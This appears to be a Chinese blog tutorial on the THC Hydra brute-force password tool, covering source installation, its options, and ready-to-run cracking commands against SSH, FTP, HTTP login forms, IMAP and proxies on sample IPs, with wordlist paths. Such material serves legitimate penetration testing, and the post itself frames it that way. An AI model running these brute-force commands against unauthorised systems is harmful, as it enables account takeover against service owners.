赞
踩
hydra是著名黑客组织thc的一款开源的暴力密码破解工具,可以在线破解多种密码。官网:http://www.thc.org/thc-hydra
这款暴力密码破解工具相当强大,支持几乎所有协议的在线密码破解,其密码能否被破解关键在于字典是否足够强大。对于社会工程型渗透来说,有时能够得到事半功倍的效果。本文仅从安全角度去探讨测试,请勿用于非法事件。
yum install openssl-devel pcre-devel ncpfs-devel postgresql-devel libssh-devel subversion-devel libncurses-devel
- # 选择下载安装目录
- cd /usr/local/src
-
- # 云端下载安装包
- wget http://freeworld.thc.org/releases/hydra-6.3-src.tar.gz
-
- # 解压缩
- tar zxf hydra-6.3-src.tar.gz
-
- # 进入安装目录
- cd hydra-6.3-src
-
- # 生成编译文件:./configure会检测当前系统一些组件配置,主要是对于破解支持模块的检测,可根据需要安装对应的支持库和依赖包
- ./configure#
-
- # 编译
- make
-
- # 编译安装
- make install
hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e ns] [-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-f] [-s PORT] [-S] [-vV] server service [OPT] -R 继续从上一次进度接着破解。 -S 采用SSL链接。 -s PORT 可通过这个参数指定非默认端口。 -l LOGIN 指定破解的用户,对特定用户破解。 -L FILE 指定用户名字典。 -p PASS 小写,指定密码破解,少用,一般是采用密码字典。 -P FILE 大写,指定密码字典。 -e ns 可选选项,n:空密码试探,s:使用指定用户和密码试探。 -C FILE 使用冒号分割格式,例如“登录名:密码”来代替-L/-P参数。 -M FILE 指定目标列表文件一行一条。 -o FILE 指定结果输出文件。 -f 在使用-M参数以后,找到第一对登录名或者密码的时候中止破解。 -t TASKS 同时运行的线程数,默认为16。 -w TIME 设置最大超时的时间,单位秒,默认是30s。 -v / -V 显示详细过程。 server 目标ip service 指定服务名,支持的服务和协议:telnet ftp pop3[-ntlm] imap[-ntlm] smb smbnt http-{head|get} http-{get|post}-form http-proxy cisco cisco-enable vnc ldap2 ldap3 mssql mysql oracle-listener postgres nntp socks5 rexec rlogin pcnfs snmp rsh cvs svn icq sapr3 ssh smtp-auth[-ntlm] pcanywhere teamspeak sip vmauthd firebird ncp afp等等。 OPT 可选项
- # 破解ssh
- hydra -L users.txt -P password.txt -t 1 -vV -e ns 10.0.0.4 ssh -o log.txt
-
- # -L file 指定用户名字典路径
- # -P file 指定密码字典路径
- # -t number 线程数
- # -vV 显示视图
- # -e ns 试探操作
- # -o file 指定输出文件
- # hydra ip ftp -l 用户名 -P 密码字典 -t 线程(默认16) -vV
- # hydra ip ftp -l 用户名 -P 密码字典 -e ns -vV
- # hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns ip http-get /admin/
- # hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns -f ip http-get /admin/index.php
- # hydra -l 用户名 -P 密码字典 -s 80 ip http-post-form "/admin/login.php:username=^USER^&password=^PASS^&submit=login:sorry password"
- # hydra -t 3 -l admin -P pass.txt -o out.txt -f 10.36.16.18 http-post-form "login.php:id=^USER^&passwd=^PASS^:wrong username or password"
- (参数说明:-t同时线程数3,-l用户名是admin,字典pass.txt,保存为out.txt,-f 当破解了一个密码就停止, 10.36.16.18目标ip,http-post-form表示破解是采用http的post方式提交的表单密码破解,<title>中的内容是表示错误猜解的返回信息提示。)
# hydra -m /index.php -l muts -P pass.txt 10.36.16.18 https
# hydra -l admin -P pass.txt http-proxy://10.36.16.18
- # hydra -L user.txt -p secret 10.36.16.18 imap PLAIN
- # hydra -C defaults.txt -6 imap://[fe80::2c:31ff:fe12:ac11]:143/PLAIN
此工具强大之处远多于以上测试,其密码能否破解关键在于强大的字典,对于社工型渗透来说,有时能够得到事半功倍的效果
用户名字典:/usr/share/wfuzz/wordlist/others/names.txt
密码字典:/usr/share/wfuzz/wordlist/others/common_pass.txt
Copyright © 2003-2013 www.wpsshop.cn 版权所有,并保留所有权利。